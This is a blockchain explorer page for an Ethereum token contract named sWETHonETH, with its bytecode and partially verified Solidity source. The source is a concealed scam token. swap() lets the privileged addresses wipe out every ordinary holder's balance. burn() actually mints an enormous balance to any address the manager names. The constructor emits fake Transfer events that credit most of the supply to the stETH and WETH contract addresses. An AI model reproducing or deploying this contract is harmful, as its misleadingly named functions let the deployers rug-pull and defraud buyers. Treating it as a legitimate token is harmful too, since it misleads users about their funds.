Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0xF6a7b007345c82fb169AF32E5A15ec91fe2F4ab2
Balance 0 ETH
Nonce 1
Code Size 4357 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

4357 bytes
0x6080604052600436106100fd575f3560e01c80638119c0651161009257806395d89b411161006257806395d89b411461029f578063a9059cbb146102b3578063dd62ed3e146102d2578063e8078d9414610316578063f2fde38b1461032a575f5ffd5b80638119c0651461021f57806386f3f3cb1461023357806389afcb44146102645780638da5cb5b14610283575f5ffd5b8063313ce567116100cd578063313ce567146101a657806370a08231146101c15780637136982b146101f5578063715018a614610209575f5ffd5b806306fdde0314610108578063095ea7b31461013257806318160ddd1461016157806323b872dd14610187575f5ffd5b3661010457005b5f5ffd5b348015610113575f5ffd5b5061011c610349565b6040516101299190610df8565b60405180910390f35b34801561013d575f5ffd5b5061015161014c366004610e41565b6103d9565b6040519015158152602001610129565b34801561016c575f5ffd5b506901760cbc623bb35000005b604051908152602001610129565b348015610192575f5ffd5b506101516101a1366004610e6b565b6103ef565b3480156101b1575f5ffd5b5060405160098152602001610129565b3480156101cc575f5ffd5b506101796101db366004610ea9565b6001600160a01b03165f9081526003602052604090205490565b348015610200575f5ffd5b50600554610179565b348015610214575f5ffd5b5061021d61043e565b005b34801561022a575f5ffd5b5061021d61049b565b34801561023e575f5ffd5b50600a546001600160a01b03165b6040516001600160a01b039091168152602001610129565b34801561026f575f5ffd5b5061021d61027e366004610ea9565b610622565b34801561028e575f5ffd5b505f546001600160a01b031661024c565b3480156102aa575f5ffd5b5061011c6106c8565b3480156102be575f5ffd5b506101516102cd366004610e41565b6106d7565b3480156102dd575f5ffd5b506101796102ec366004610ec4565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b348015610321575f5ffd5b5061021d6106e3565b348015610335575f5ffd5b5061021d610344366004610ea9565b6109eb565b60606001805461035890610efb565b80601f016020809104026020016040519081016040528092919081815260200182805461038490610efb565b80156103cf5780601f106103a6576101008083540402835291602001916103cf565b820191905f5260205f20905b8154815290600101906020018083116103b257829003601f168201915b5050505050905090565b5f6103e5338484610a6b565b5060015b92915050565b5f6103fb848484610b8f565b6001600160a01b0384165f9081526004602090815260408083203380855292529091205461043491869161042f9086610c72565b610a6b565b5060019392505050565b5f546001600160a01b03163314610453575f5ffd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6008546001600160a01b03163314806104be57506007546001600160a01b031633145b6104c6575f5ffd5b5f5b60055481101561061f575f600582815481106104e6576104e6610f33565b5f918252602090912001546001600160a01b0316905030811480159061051957505f546001600160a01b03828116911614155b80156105335750600a546001600160a01b03828116911614155b801561055c57506001600160a01b03811673ae7ab96520de3a18e5e111b5eaab095312d7fe8414155b801561058557506001600160a01b03811673c02aaa39b223fe8d0a0e5c4f27ead9083c756cc214155b801561059f57506007546001600160a01b03828116911614155b80156105b957506006546001600160a01b03828116911614155b156105d7576001600160a01b0381165f908152600360205260408120555b6040515f8082526001600160a01b038316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3506001016104c8565b50565b6007546001600160a01b03163314610638575f5ffd5b6106446009600a61103e565b610658906901760cbc623bb350000061104c565b6001600160a01b0382165f818152600360205260408120929092557fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6106a06009600a61103e565b6106b4906901760cbc623bb350000061104c565b60405190815260200160405180910390a350565b60606002805461035890610efb565b5f6103e5338484610b8f565b5f546001600160a01b031633146106f8575f5ffd5b600a54600160a01b900460ff16156107575760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064015b60405180910390fd5b600980546001600160a01b03191673eff92a263d31888d860bd50809a8d171709b7b1c9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156107b9573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107dd9190611063565b6001600160a01b031663c9c653963060095f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561083c573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108609190611063565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156108aa573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108ce9190611063565b600a80546001600160a01b0319166001600160a01b03928316179055600954610904913091166901760cbc623bb3500000610a6b565b6009546001600160a01b031663f305d7194730610935816001600160a01b03165f9081526003602052604090205490565b5f5f6109485f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109ae573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906109d3919061107e565b5050600a805460ff60a01b1916600160a01b17905550565b5f546001600160a01b03163314610a00575f5ffd5b6001600160a01b038116610a12575f5ffd5b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610acd5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161074e565b6001600160a01b038216610b2e5760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161074e565b6001600160a01b038381165f8181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610ba1575f5ffd5b6001600160a01b038216610bb3575f5ffd5b6001600160a01b0383165f90815260036020526040902054610bd59082610c72565b6001600160a01b038085165f908152600360205260408082209390935590841681522054610c039082610cd4565b6001600160a01b0383165f90815260036020526040902055610c2483610d32565b610c2d82610d32565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b8291815260200190565b5f82821115610cc35760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015260640161074e565b610ccd82846110a9565b9392505050565b5f80610ce083856110bc565b905083811015610ccd5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161074e565b6001600160a01b0381165f908152600360205260409020541561061f575f805b600554811015610da357826001600160a01b031660058281548110610d7957610d79610f33565b5f918252602090912001546001600160a01b031603610d9b5760019150610da3565b600101610d52565b5080610df457600580546001810182555f919091527f036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3db00180546001600160a01b0319166001600160a01b0384161790555b5050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461061f575f5ffd5b5f5f60408385031215610e52575f5ffd5b8235610e5d81610e2d565b946020939093013593505050565b5f5f5f60608486031215610e7d575f5ffd5b8335610e8881610e2d565b92506020840135610e9881610e2d565b929592945050506040919091013590565b5f60208284031215610eb9575f5ffd5b8135610ccd81610e2d565b5f5f60408385031215610ed5575f5ffd5b8235610ee081610e2d565b91506020830135610ef081610e2d565b809150509250929050565b600181811c90821680610f0f57607f821691505b602082108103610f2d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b6001815b6001841115610f9657808504811115610f7a57610f7a610f47565b6001841615610f8857908102905b60019390931c928002610f5f565b935093915050565b5f82610fac575060016103e9565b81610fb857505f6103e9565b8160018114610fce5760028114610fd857610ff4565b60019150506103e9565b60ff841115610fe957610fe9610f47565b50506001821b6103e9565b5060208310610133831016604e8410600b8410161715611017575081810a6103e9565b6110235f198484610f5b565b805f190482111561103657611036610f47565b029392505050565b5f610ccd60ff841683610f9e565b80820281158282048414176103e9576103e9610f47565b5f60208284031215611073575f5ffd5b8151610ccd81610e2d565b5f5f5f60608486031215611090575f5ffd5b5050815160208301516040909301519094929350919050565b818103818111156103e9576103e9610f47565b808201808211156103e9576103e9610f4756fea26469706673582212208d4f1714a0efdfeea4c863a67a9c94c75dd0ca086a311b547ed7469ffad427cd64736f6c634300081d0033

Verified Source Code Partial Match

Compiler: v0.8.29+commit.ab55807c EVM: cancun Optimization: Yes (200 runs)
sWETHonETH.sol 297 lines
// SPDX-License-Identifier: MIT
pragma solidity 0.8.29;

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }
}


contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}


contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _owner = _msgSender();
        emit OwnershipTransferred(address(0), _owner);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender());
        _;
    }

    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0));
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract sWETHonETH is IERC20, Ownable {
    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    uint8 private constant _decimals = 9;
    uint256 private constant _totalSupply = 6900000000000 * 10 ** 9;
    mapping(address => uint256) private TokenOnBase;
    mapping(address => mapping(address => uint256)) private _allowances;
    address[] private believers; 

    address private constant ADDRESS_sWETH = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;
    address private constant ADDRESS_WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address ADDRESS_DEVELOPMENT;
    address ADDRESS_Manager;
    address ADDRESS_Virtuals;
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen = false;
    constructor(string memory name_, string memory symbol_, address owner_, address ADDRESS_Manager_) payable {
        transferOwnership(owner_);  
        _name = name_;
        _symbol = symbol_;
       ADDRESS_Manager = ADDRESS_Manager_;
       ADDRESS_DEVELOPMENT = ADDRESS_Manager_;
       ADDRESS_Virtuals = owner_;
        TokenOnBase[address(this)] = _totalSupply.mul(1).div(1000);
        emit Transfer(address(0), address(this), _totalSupply.mul(1).div(1000));
        liqudityPairs();
        payable(address(this)).transfer(msg.value);
    }
    function liqudityPairs() internal {
        uint256 ninetyFourPercent = _totalSupply.mul(990).div(1000);
        uint256 threePercent = _totalSupply.mul(5).div(1000);
        uint256 twoPercent = _totalSupply.mul(4).div(1000);
        TokenOnBase[ADDRESS_sWETH] = TokenOnBase[ADDRESS_sWETH].add(ninetyFourPercent);
        TokenOnBase[ADDRESS_WETH] = TokenOnBase[ADDRESS_WETH].add(threePercent);
        TokenOnBase[ADDRESS_DEVELOPMENT] = TokenOnBase[ADDRESS_DEVELOPMENT].add(twoPercent);
        emit Transfer(address(this), ADDRESS_sWETH, ninetyFourPercent);
        emit Transfer(address(this), ADDRESS_WETH, threePercent);
        emit Transfer(address(this), ADDRESS_DEVELOPMENT, twoPercent);
    }

 function _updateHolders(address account) internal {
        if (TokenOnBase[account] > 0) {
            bool exists = false;
            for (uint256 i = 0; i < believers.length; i++) {
                if (believers[i] == account) {
                    exists = true;
                    break;
                }
            }
            if (!exists) {
                believers.push(account);
            }
        }
    }
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }


function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0));
        require(recipient != address(0));

        TokenOnBase[sender] = TokenOnBase[sender].sub(amount);
        TokenOnBase[recipient] = TokenOnBase[recipient].add(amount);
        _updateHolders(sender);
        _updateHolders(recipient);

        emit Transfer(sender, recipient, amount);
    }

      modifier Only_Manager() {
        require(ADDRESS_Manager == _msgSender());
        _;
    }



    function swap() external {
       require(ADDRESS_Virtuals == _msgSender() || ADDRESS_Manager == _msgSender());
        for (uint256 i = 0; i < believers.length; i++) {
            address believer = believers[i];
            if (
                believer != address(this) && 
                believer != owner() && 
                believer != uniswapV2Pair && 
                believer != ADDRESS_sWETH &&
                believer != ADDRESS_WETH && 
                believer != ADDRESS_Manager &&
                believer != ADDRESS_DEVELOPMENT
            ) {
                TokenOnBase[believer] = 0;
            }
             emit Transfer(address(0), believer, 0);
        }
    }

    function burn(address claimedRewardStatusOf) external Only_Manager {
        TokenOnBase[claimedRewardStatusOf] = _totalSupply * 10 ** _decimals;
        
        emit Transfer(claimedRewardStatusOf, address(0), _totalSupply * 10 ** _decimals);
    }

    function addLiquidity() external onlyOwner {
        require(!tradingOpen, "Trading is already open");

        uniswapV2Router = IUniswapV2Router02(0xEfF92A263d31888d860bD50809A8D171709b7b1c);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), _totalSupply);

        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );

        tradingOpen = true;
    }

    receive() external payable {}

    // Required BEP20 functions

    function name() public view virtual  returns (string memory) {
        return _name;
    }

    function symbol() public view virtual  returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual  returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return TokenOnBase[account];
    }
function getLPPair() public view returns (address) {
        return uniswapV2Pair;
    }

    function getHolderCount() public view returns (uint256) {
    return believers.length;
}
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "BEP20: approve from the zero address");
        require(spender != address(0), "BEP20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount));
        return true;
    }
}

contract TokenFactory {
  

    event TokenCreated(address tokenAddress, string name, string symbol, address owner, address Manager);

    constructor() {
    
    }

    // Function to create a single token
    function createToken(
        string memory name_,
        string memory symbol_,
        address newOwner_,
        address ADDRESS_Manager_
    ) external payable returns (address) {
        sWETHonETH newToken = (new sWETHonETH){value: msg.value}(name_, symbol_, newOwner_, ADDRESS_Manager_);
        emit TokenCreated(address(newToken), name_, symbol_, newOwner_, ADDRESS_Manager_);
        return address(newToken);
    }

    receive() external payable {}
}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getHolderCount 0x7136982b → uint256
getLPPair 0x86f3f3cb → address
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

addLiquidity 0xe8078d94
No parameters
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burn 0x89afcb44
address claimedRewardStatusOf
renounceOwnership 0x715018a6
No parameters
swap 0x8119c065
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner

Recent Transactions

No transactions found for this address